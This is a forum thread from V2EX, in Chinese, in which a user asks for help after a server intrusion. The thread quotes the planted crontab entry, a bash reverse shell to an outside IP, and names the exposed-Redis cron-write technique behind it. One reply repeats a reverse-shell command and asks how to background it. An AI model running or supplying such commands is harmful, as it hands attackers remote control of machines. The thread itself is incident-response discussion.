服务器被入侵了,有懂的老铁帮忙看下,万分感谢

2020-12-22 22:29:04 +08:00
 bigbigeggs

crontab 的定时任务全部被清空,换成了 如下

"\n* * * * * bash -i >& /dev/tcp/123.56.128.98/8888 0>&1\n"

删除之后,过几秒之后,又出现在了定时任务中了。

百度了下看起来像是 反弹 shell,可以看到你在服务器的任何行为。

现在不知道怎么解决,不知道哪个脚本在后台执行,一直写定时任务进去。

求有懂得老铁帮忙看下

4410 次点击
所在节点    问与答
47 条回复
bigbigeggs
2020-12-23 16:18:51 +08:00
@WordTian @yuelang85 确定了,是通过 redis set key,然后 conf 修改了 dump 的文件目录,大意了,唉
InkAndBanner
2020-12-23 17:26:04 +08:00
redis 的问题 很常见 我的学生机曾经也被安排过
bigbigeggs
2020-12-23 19:41:42 +08:00
@iloveayu 我也查到他的 qq,姓名了,准备 qq 联系一下。还没有手机号,不知道咋搞
CodeCodeStudy
2020-12-24 09:13:58 +08:00
@bigbigeggs #38 反弹 shell,受害者机器上 bash -i >& /dev/tcp/192.168.146.129/2333 0>&1 这命令是在前台运行的,怎么让它在后台运行呢?我在后面加上 & 后,在攻击者机器上就看不到输入输出了。
onice
2020-12-24 10:21:59 +08:00
建议备份业务和数据,重装系统。Linux 系统可以安后门的地方太多了,比如替换某个系统文件,比如常见的 ls 命令。那么多命令,鬼才知道是替换的哪一个。
也不是说不可以排查,但排查的成本大于重装的成本。
bigbigeggs
2020-12-24 12:59:19 +08:00
@CodeCodeStudy linux 上定时任务,crontab 每分每秒都执行
CodeCodeStudy
2020-12-24 19:07:11 +08:00
@bigbigeggs #46 Linux 上的 crontab 只能精确到分钟,怎么让它每分每秒都执行?

这是一个专为移动设备优化的页面(即为了让你能够在 Google 搜索结果里秒开这个页面),如果你希望参与 V2EX 社区的讨论,你可以继续到 V2EX 上打开本讨论主题的完整版本。

https://www.v2ex.com/t/738036

V2EX 是创意工作者们的社区,是一个分享自己正在做的有趣事物、交流想法,可以遇见新朋友甚至新机会的地方。

V2EX is a community of developers, designers and creative people.

© 2021 V2EX